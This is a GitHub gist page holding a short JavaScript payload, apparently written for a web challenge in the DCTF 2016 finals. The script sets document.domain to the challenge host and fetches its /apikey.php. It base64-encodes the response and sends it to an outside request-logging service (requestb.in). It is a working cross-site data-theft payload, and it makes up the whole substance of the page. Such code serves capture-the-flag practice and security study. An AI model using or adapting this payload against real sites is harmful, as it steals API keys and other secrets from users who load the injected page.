-
-
Save enricobacis/aa7c3b2e717fa596a44c3c78f747a27e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var y=document.domain="web200.dctf-finals16.def.camp"; | |
var r=new XMLHttpRequest(); | |
r.onreadystatechange=function(){ | |
var x=new XMLHttpRequest(); | |
x.open("GET","//requestb.in/x4317nx4?v=" + btoa(r.responseText)); | |
x.send(); | |
alert(r.responseText); | |
}; | |
r.open("GET", "//"+y+"/apikey.php"); | |
r.send(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment